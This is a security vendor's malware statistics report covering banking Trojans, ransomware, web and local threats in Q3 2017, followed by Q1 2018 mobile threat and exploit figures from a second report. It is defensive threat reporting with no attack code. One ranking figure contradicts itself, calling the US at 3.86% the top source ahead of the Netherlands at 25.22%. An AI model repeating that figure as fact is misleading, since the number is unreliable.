The table below shows the Top 10 malware families used in Q3 2017 to attack online banking users (in terms of percentage of users attacked):

| | Name* | % of attacked users** |
|---|---|---|
| 1 | Trojan-Spy.Win32.Zbot | 27.9 |
| 2 | Trojan.Win32.Nymaim | 20.4 |
| 3 | Trojan.Win32.Neurevt | 10.0 |
| 4 | Trickster | 9.5 |
| 5 | SpyEye | 7.5 |
| 6 | Caphaw | 6.3 |
| 7 | Trojan-Banker.Win32.Gozi | 2.0 |
| 8 | Shiz | 1.8 |
| 9 | ZAccess | 1.6 |
| 10 | NeutrinoPOS | 1.6 |

_* The detection verdicts of Kaspersky Lab products, received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by the malware in question as a percentage of all users attacked by financial malware._

The malware families Dridex and Tinba lost their places in this quarter's Top 10. One of their former positions was occupied by the Trickster bot (accounting for 9.5% of attacked users), also known as TrickBot, a descendant of the now defunct Dyre banker. There was a small change in the leading three malicious families. First and second places are still occupied by Trojan-Spy.Win32.Zbot (27.9%) and Trojan.Win32.Nymaim (20.4%) respectively, while third place is now occupied by Trojan.Win32.Neurevt (10%), whose share grew by nearly 4 p.p.

### Cryptoware programs

#### Q3 highlights

##### Crysis rises from the dead

In our Q2 report [we wrote](<https://securelist.com/it-threat-evolution-q2-2017-statistics/79432/>) that the cybercriminals behind the Crysis ransomware cryptor halted distribution of the malware and published the secret keys needed to decrypt files.
This took place in May 2017, and all propagation of the ransomware was stopped completely at that time.

However, nearly three months later, in mid-August, we discovered that this Trojan had come back from the dead and had set out on a new campaign of active propagation. The email addresses used by the blackmailers were different from those used in earlier samples of Crysis. A detailed analysis revealed that the new samples of the Trojan were completely identical to the old ones apart from just one thing – the public master keys were new. Everything else was the same, including the compilation timestamp in the PE header and, more interestingly, the labels that the Trojan leaves in the service area at the end of each encrypted file. Closer scrutiny of the samples suggests that the new distributors of the malware didn't have the source code, so they just took its old body and used a hex editor to change the key and the contact email.

The above suggests that this piece of 'zombie' malware is being spread by a different group of malicious actors rather than its original developer, who disclosed all the private keys in May.

##### Surge in Cryrar attacks

The Cryrar cryptor (aka ACCDFISA) is a veteran among the ransomware Trojans that are currently being spread. It emerged way back in 2012 and has been active ever since. The cryptor is written in PureBasic and uses a legitimate RAR archiver executable to place the victim's files in password-encrypted RAR SFX archives.

In the first week of September 2017 we recorded a dramatic rise in the number of attempted infections with Cryrar – a surge never seen before or since. The malicious actors used the following approach: they crack the RDP password by brute force, authenticate to the victim's system over the remote access protocol and manually launch the Trojan's installation file. The latter, in turn, installs the cryptor's body and the components it requires (including the renamed RAR.EXE file), and then automatically launches the cryptor.

According to KSN data, this wave of attacks primarily targeted Vietnam, China, the Philippines and Brazil.

##### Master key to original versions of Petya/Mischa/GoldenEye published

In July 2017, the authors of the [Petya Trojan](<https://securelist.com/petya-the-two-in-one-trojan/74609/>) published their master key, which can be used to decrypt the Salsa keys required to decrypt the MFT and unblock access to systems affected by Petya/Mischa or GoldenEye.

This happened shortly after the [ExPetr epidemic](<https://securelist.com/schroedingers-petya/78870/>), which used part of the GoldenEye code. This suggests that the authors of Petya/Mischa/GoldenEye did so in an attempt to distance themselves from the ExPetr attack and the outcry that it caused.

Unfortunately, this master key won't help those affected by ExPetr, as its creators [didn't include](<https://securelist.com/expetrpetyanotpetya-is-a-wiper-not-ransomware/78902/>) the option of restoring a Salsa key to decrypt the MFT.

#### The number of new modifications

In Q3 2017, we identified five new ransomware families in this classification. It's worth noting here that this number doesn't include all the Trojans that weren't assigned their own 'personal' verdict. Each quarter, dozens of these malicious programs emerge, though they either have so few distinctive characteristics or occur so rarely that they and the hundreds of others like them remain nameless, and are detected with generic verdicts.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-13-en.jpg>)

Number of newly created cryptor modifications, Q3 2016 – Q3 2017

The number of new cryptor modifications continues to decline compared to previous quarters.
This could be a temporary trend, or could indicate that cybercriminals are gradually losing interest in cryptors as a means of making money and are switching over to other types of malware.

#### The number of users attacked by ransomware

July was the month with the lowest ransomware activity. From July to September, the number of ransomware attacks rose, though it remained lower than in May and June, when two massive epidemics (WannaCry and ExPetr) struck.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-14-en.jpg>)

Number of unique users attacked by Trojan-Ransom cryptor malware (Q3 2017)

#### The geography of attacks

[](<https://securelist.com/files/2017/11/q3-2017-statistics-15-en.jpg>)

#### Top 10 countries attacked by cryptors

| | Country* | % of users attacked by cryptors** |
|---|---|---|
| 1 | Myanmar | 0.95% |
| 2 | Vietnam | 0.92% |
| 3 | Indonesia | 0.69% |
| 4 | Germany | 0.62% |
| 5 | China | 0.58% |
| 6 | Russia | 0.51% |
| 7 | Philippines | 0.50% |
| 8 | Venezuela | 0.50% |
| 9 | Cambodia | 0.50% |
| 10 | Austria | 0.49% |

_* We excluded those countries where the number of Kaspersky Lab product users is relatively small (under 50,000).
** Unique users whose computers have been targeted by ransomware as a percentage of all unique users of Kaspersky Lab products in the country._

Most of the countries in this Top 10 are from Asia, including Myanmar (0.95%), a newcomer to the Top 10 that swept into first place in Q3. Vietnam (0.92%) came second, moving up two places from Q2, while China (0.58%) rose one place to fifth.

Brazil, Italy and Japan were the leaders in Q2, but in Q3 they failed to make it into the Top 10.
Europe is represented by Germany (0.62%) and Austria (0.49%).

Russia, in tenth the previous quarter, ended Q3 in sixth place.

#### Top 10 most widespread cryptor families

| | Name | Verdict* | % of attacked users** |
|---|---|---|---|
| 1 | WannaCry | Trojan-Ransom.Win32.Wanna | 16.78% |
| 2 | Crypton | Trojan-Ransom.Win32.Cryptoff | 14.41% |
| 3 | Purgen/GlobeImposter | Trojan-Ransom.Win32.Purgen | 6.90% |
| 4 | Locky | Trojan-Ransom.Win32.Locky | 6.78% |
| 5 | Cerber | Trojan-Ransom.Win32.Zerber | 4.30% |
| 6 | Cryrar/ACCDFISA | Trojan-Ransom.Win32.Cryrar | 3.99% |
| 7 | Shade | Trojan-Ransom.Win32.Shade | 2.69% |
| 8 | Spora | Trojan-Ransom.Win32.Spora | 1.87% |
| 9 | (generic verdict) | Trojan-Ransom.Win32.Gen | 1.77% |
| 10 | (generic verdict) | Trojan-Ransom.Win32.CryFile | 1.27% |

_* These statistics are based on detection verdicts received from users of Kaspersky Lab products who have consented to provide their statistical data.
** Unique users whose computers have been targeted by a specific Trojan-Ransom family as a percentage of all users of Kaspersky Lab products attacked by Trojan-Ransom malware._

WannaCry (16.78%) tops the rating for Q3, and the odds are that it's set to remain there: the worm has been propagating uncontrollably, and there are still huge numbers of computers across the globe with the unpatched vulnerability that WannaCry exploits.

Crypton (14.41%) came second. This cryptor emerged in spring 2016 and has undergone many modifications since. It has also been given multiple names: CryptON, JuicyLemon, PizzaCrypts, Nemesis, x3m, Cry9, Cry128, Cry36.

The cryptor Purgen (6.90%) rounds off the top three after rising from ninth. The rest of the rating is populated by 'old timers' – the Trojans Locky, Cerber, Cryrar, Shade, and Spora.

The Jaff cryptor appeared in the spring of 2017, going straight into fourth place in the Q2 rating, and then stopped spreading just as suddenly.

### Top 10 countries where online resources are seeded with malware

_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._

In the third quarter of 2017, Kaspersky Lab solutions blocked **277,646,376** attacks launched from web resources located in 185 countries around the world. **72,012,219** unique URLs were recognized as malicious by web antivirus components.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-16-en.jpg>)

Distribution of web attack sources by country, Q3 2017

In Q3 2017, the US (3.86%) was home to most sources of web attacks. The Netherlands (25.22%) remained in second place, while Germany moved up from fifth to third. Finland and Singapore dropped out of the top five and were replaced by Ireland (1.36%) and Ukraine (1.36%).

**Countries where users faced the greatest risk of online infection**

In order to assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users in each country who encountered detection verdicts on their machines during the quarter.
The resulting data provides an indication of the aggressiveness of the environment in which computers work in different countries.

This rating only includes attacks by malicious programs that fall under the **_Malware_** class. The rating does not include web antivirus module detections of potentially dangerous or unwanted programs such as RiskTool or adware.

| | Country* | % of users attacked** |
|---|---|---|
| 1 | Belarus | 27.35 |
| 2 | Algeria | 24.23 |
| 3 | Russia | 23.91 |
| 4 | Armenia | 23.74 |
| 5 | Moldova | 23.61 |
| 6 | Greece | 21.48 |
| 7 | Azerbaijan | 21.14 |
| 8 | Kyrgyzstan | 20.83 |
| 9 | Uzbekistan | 20.24 |
| 10 | Albania | 20.10 |
| 11 | Ukraine | 19.82 |
| 12 | Kazakhstan | 19.55 |
| 13 | France | 18.94 |
| 14 | Venezuela | 18.68 |
| 15 | Brazil | 18.01 |
| 16 | Portugal | 17.93 |
| 17 | Vietnam | 17.81 |
| 18 | Tajikistan | 17.63 |
| 19 | Georgia | 17.50 |
| 20 | India | 17.43 |

_These statistics are based on detection verdicts returned by the web antivirus module, received from users of Kaspersky Lab products who have consented to provide their statistical data._
_* These calculations excluded countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** Unique users whose computers have been targeted by **Malware-class** attacks as a percentage of all unique users of Kaspersky Lab products in the country._

On average, 16.61% of computers connected to the Internet globally were subjected to at least one **Malware-class** web attack during the quarter.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-17-en.jpg>)

Geography of malicious web attacks in Q3 2017 (ranked by percentage of users attacked)

The countries with the safest online surfing environments included Iran (9.06%), Singapore (8.94%), Puerto Rico (6.67%), Niger (5.14%) and Cuba (4.44%).

## Local threats

_Local infection statistics for user computers are a very important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got onto the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._

_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media._

In Q3 2017, Kaspersky Lab's file antivirus detected **198,228,428** unique malicious and potentially unwanted objects.

**Countries where users faced the highest risk of local infection**

For each country, we calculated the percentage of Kaspersky Lab product users on whose computers the file antivirus was triggered during the quarter. These statistics reflect the level of personal computer infection in different countries.

The rating of malicious programs only includes **Malware-class** attacks.
The rating does not include detections of potentially dangerous or unwanted programs such as RiskTool or adware.

| | Country* | % of users attacked** |
|---|---|---|
| 1 | Yemen | 56.89 |
| 2 | Vietnam | 54.32 |
| 3 | Afghanistan | 53.25 |
| 4 | Uzbekistan | 53.02 |
| 5 | Laos | 52.72 |
| 6 | Tajikistan | 49.72 |
| 7 | Ethiopia | 48.90 |
| 8 | Syria | 47.71 |
| 9 | Myanmar | 46.82 |
| 10 | Cambodia | 46.69 |
| 11 | Iraq | 45.79 |
| 12 | Turkmenistan | 45.47 |
| 13 | Libya | 45.00 |
| 14 | Bangladesh | 44.54 |
| 15 | China | 44.40 |
| 16 | Sudan | 44.27 |
| 17 | Mongolia | 44.18 |
| 18 | Mozambique | 43.84 |
| 19 | Rwanda | 43.22 |
| 20 | Belarus | 42.53 |

_These statistics are based on detection verdicts returned by on-access and on-demand antivirus modules, received from users of Kaspersky Lab products who have consented to provide their statistical data. The data include detections of malicious programs located on users' computers or on removable media connected to the computers, such as flash drives, camera and phone memory cards, or external hard drives._
_* These calculations exclude countries where the number of Kaspersky Lab users is relatively small (under 10,000 users).
** The percentage of unique users in the country with computers that blocked **Malware-class** local threats as a percentage of all unique users of Kaspersky Lab products._

This Top 20 of countries has not changed much since Q2, with the exception of China (44.40%), Syria (47.71%) and Libya (45.00%) all making an appearance.
The proportion of users attacked in Russia amounted to 29.09%.

On average, 23.39% of computers globally faced at least one **Malware-class** local threat during the third quarter.

[](<https://securelist.com/files/2017/11/q3-2017-statistics-18-en.jpg>)

Geography of local malware attacks in Q3 2017 (ranked by percentage of users attacked)

**The safest countries in terms of local infection risks** included Estonia (15.86%), Singapore (11.97%), New Zealand (9.24%), Czechia (7.89%), Ireland (6.86%) and Japan (5.79%).

_All the statistics used in this report were obtained using [Kaspersky Security Network](<https://www.kaspersky.com/images/KESB_Whitepaper_KSN_ENG_final.pdf>) (KSN), a distributed antivirus network that works with various anti-malware protection components. The data was collected from KSN users who agreed to provide it. Millions of Kaspersky Lab product users from 213 countries and territories worldwide participate in this global exchange of information about malicious activity._

_Source: "IT threat evolution Q3 2017. Statistics", Securelist, published 2017-11-10, <https://securelist.com/it-threat-evolution-q3-2017-statistics/83131/>._

## Q1 figures

According to KSN:

* Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.
* 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.
* Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.
* Ransomware attacks were registered on the computers of 179,934 unique users.
* Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.
* Kaspersky Lab products for mobile devices detected:
  * 1,322,578 malicious installation packages
  * 18,912 installation packages for mobile banking Trojans
  * 8,787 installation packages for mobile ransomware Trojans

## Mobile threats

### Q1 events

In Q1 2018, DNS hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates.
That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)

_This malicious resource shows a fake window while displaying the legitimate site in the address bar_

It wasn't a [drive-by download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.

However, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)

Some backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to upload the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.

### Mobile threat statistics

In Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)

_Number of detected malicious installation packages, Q2 2017 – Q1 2018_

#### Distribution of detected mobile apps by type

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)

_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018_

Among all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.

Second place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.

Advertising apps, which ranked second in Q4 2017, dropped a place; their share decreased by 8%, accounting for 11% of all detected threats.

On a separate note, Q1 saw a rise in the share of mobile banking threats.
This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). 
This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.23%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a standard set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. 
Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). 
The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. 
This Trojan has extensive spy capabilities: it can install other apps, intercept incoming messages (or create them on command), make calls and USSD requests, and, of course, open links to phishing pages.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171313/180511-it-threats-q1-18-statistics-8.png>)\n\n_Geography of mobile banking threats in Q1 2018 (percentage of attacked users)_\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans**\n\n | Country* | %** \n---|---|--- \n1 | Russia | 0.74 \n2 | USA | 0.65 \n3 | Tajikistan | 0.31 \n4 | Uzbekistan | 0.30 \n5 | China | 0.26 \n6 | Turkey | 0.22 \n7 | Ukraine | 0.22 \n8 | Kazakhstan | 0.22 \n9 | Poland | 0.17 \n10 | Moldova | 0.16 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in this country._\n\nThe Q1 2018 rating was much the same as the situation observed throughout 2017: Russia (0.74%) remained top.\n\nThe US (0.65%) and Tajikistan (0.31%) took silver and bronze, respectively. The most popular mobile banking Trojans in these countries were various modifications of the [Trojan-Banker.AndroidOS.Svpeng](<https://securelist.com/latest-version-of-svpeng-targets-users-in-us/63746/>) family, as well Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### Mobile ransomware Trojans\n\nIn Q1 2018, we detected **8,787** installation packages for mobile ransomware Trojans, which is just over half the amount seen in the previous quarter and 22 times less than in Q2 2017. This significant drop is largely because attackers began to make more use of droppers in an attempt to hinder detection and hide the payload. 
As a result, such malware is detected as a dropper (for example, from the Trojan-Dropper.AndroidOS.Hqwar family), even though it may contain mobile ransomware or a \"banker.\"\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171322/180511-it-threats-q1-18-statistics-9.png>)\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab (Q2 2017 \u2013 Q1 2018)_\n\nNote that despite the decline in their total number, ransomware Trojans remain a serious threat \u2014 technically they are now far more advanced and dangerous. For instance, Trojan-Ransom.AndroidOS.Svpeng acquires device administrator rights and, if an attempt is made to revoke them, locks the smartphone screen with a PIN of its own. Even if the user had set no lock at all (the existing lock could also be a pattern, numeric code, or biometric), the device ends up locked, and the only way to restore the smartphone to working order is a factory reset.\n\nThe most widespread mobile ransomware in Q1 was Trojan-Ransom.AndroidOS.Zebt.a \u2014 it was encountered by more than half of all users attacked by mobile ransomware. In second place was Trojan-Ransom.AndroidOS.Fusob.h, which had held pole position for a long time. The once popular Trojan-Ransom.AndroidOS.Svpeng.ab only managed fifth place, behind Trojan-Ransom.AndroidOS.Egat.d and Trojan-Ransom.AndroidOS.Small.snt. 
Incidentally, Egat.d is a pared-down version of Zebt.a; both have the same creators.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171331/180511-it-threats-q1-18-statistics-10.png>)\n\n_Geography of mobile ransomware Trojans in Q1 2018 (percentage of attacked users)_\n\nTOP 10 countries by share of users attacked by mobile ransomware Trojans:\n\n | Country* | %** \n---|---|--- \n1 | Kazakhstan | 0.99 \n2 | Italy | 0.64 \n3 | Ireland | 0.63 \n4 | Poland | 0.61 \n5 | Belgium | 0.56 \n6 | Austria | 0.38 \n7 | Romania | 0.37 \n8 | Hungary | 0.34 \n9 | Germany | 0.33 \n10 | Switzerland | 0.29 \n \n_* Excluded from the rating are countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (fewer than 10,000). \n** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nFirst place in the TOP 10 again went to Kazakhstan (0.99%); the most active family in this country was Trojan-Ransom.AndroidOS.Small. Second came Italy (0.64%), where most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a, which is also the most popular mobile ransomware in third-place Ireland (0.63%).\n\n## Vulnerable apps used by cybercriminals\n\nIn Q1 2018, we observed some major changes in the distribution of exploits launched against users. The share of Microsoft Office exploits (47.15%) more than doubled compared with the average for 2017. This is also twice the quarterly score of the permanent leader in recent years \u2014 browser exploits (23.47%). The reason behind the sharp increase is clear: over the past year, so many different vulnerabilities have been found and exploited in Office applications that the only comparison is the number of Adobe Flash vulnerabilities found in the past. 
But lately the share of Flash exploits has been decreasing (2.57% in Q1), since Adobe and Microsoft are doing all they can to hinder the exploitation of Flash Player.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171341/180511-it-threats-q1-18-statistics-11.png>)\n\n_Distribution of exploits used in attacks by type of application attacked, Q1 2018_\n\nThe most frequently used vulnerability in Microsoft Office in Q1 was [CVE-2017-11882](<https://threats.kaspersky.com/en/vulnerability/KLA11139/>) \u2014 a stack buffer overflow in Equation Editor, a rather old component in the Office suite. Attacks using this vulnerability make up approximately one-sixth of all exploit-based attacks. This is presumably because CVE-2017-11882 exploitation is fairly reliable. Plus, the bytecode processed by Equation Editor allows the use of various obfuscations, which increases the chances of bypassing security software and launching a successful attack (Kaspersky Lab's Equation file format parser easily handles all currently known obfuscations). Another vulnerability found in Equation Editor this quarter was CVE-2018-0802. It too is exploited, but less actively. The following exploits for logical vulnerabilities in Office found in 2017 were also encountered: CVE-2017-8570, CVE-2017-8759, CVE-2017-0199. But even their combined number of attacks does not rival CVE-2017-11882.\n\nAs for zero-day exploits in Q1, CVE-2018-4878 was reported by a South Korean CERT and several other sources in late January. This is an Adobe Flash vulnerability originally used in targeted attacks (reportedly by the Scarcruft group). At the end of the quarter, an exploit for it appeared in the widespread GreenFlash Sundown, Magnitude, and RIG exploit kits. 
In targeted attacks, a Flash object with the exploit was embedded in a Word document, while exploit kits distribute it via web pages.\n\nLarge-scale use of network exploits using vulnerabilities patched by the MS17-010 update (those that exploited [EternalBlue](<https://threats.kaspersky.com/en/vulnerability/KLA10977/>) and other vulnerabilities from the Shadow Brokers leak) also continued throughout the quarter. MS17-010 exploits account for more than 25% of all network attacks that we registered.\n\n## Malicious programs online (attacks via web resources)\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected. _\n\n### **Online threats in the financial sector**\n\n#### Q1 events\n\nIn early 2018, the owners of the Trojan Dridex were particularly active. Throughout its years-long existence, this malware has acquired a solid infrastructure. Today, its main line of activity is compromising credentials for online banking services with subsequent theft of funds from bank accounts. Its accomplice is fellow banking Trojan Emotet. Discovered in 2014, this malware also belongs to a new breed of banking Trojans developed from scratch. However, it was located on the same network infrastructure as Dridex, suggesting a close link between the two families. But now Emotet has lost its banking functions and is used by attackers as a spam bot and loader with Dridex as the payload. Early this year, it was reported that the encryptor BitPaymer (discovered last year) was developed by the same group behind [Dridex](<https://securelist.com/dridex-a-history-of-evolution/78531/>). 
